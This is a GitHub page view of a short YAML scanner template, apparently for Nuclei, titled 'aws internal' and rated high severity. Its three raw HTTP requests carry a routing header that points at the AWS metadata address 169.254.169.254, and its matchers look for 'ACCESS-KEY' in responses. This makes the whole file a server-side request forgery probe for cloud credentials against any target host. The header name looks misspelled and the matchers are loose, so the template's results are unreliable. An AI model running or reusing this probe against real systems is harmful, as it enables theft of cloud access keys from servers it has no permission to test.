-
Notifications
You must be signed in to change notification settings - Fork 18
/
Copy pathaws.yaml
40 lines (33 loc) · 931 Bytes
/
aws.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
id: aws
info:
name: aws internal
author: MR.iambatman
severity: high
description: aws-find
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
I5d-dtab: /$/inet/169.254.169.254/80
Content-length: 100
- |
POST / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
I5d-dtab: /$/inet/169.254.169.254/80
Content-length: 100
- |
PUT / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
I5d-dtab: /$/inet/169.254.169.254/80
Content-length: 100
redirects: true
matchers:
- type: word
words:
- "latest"
- "ACCESS-KEY"
- "aws"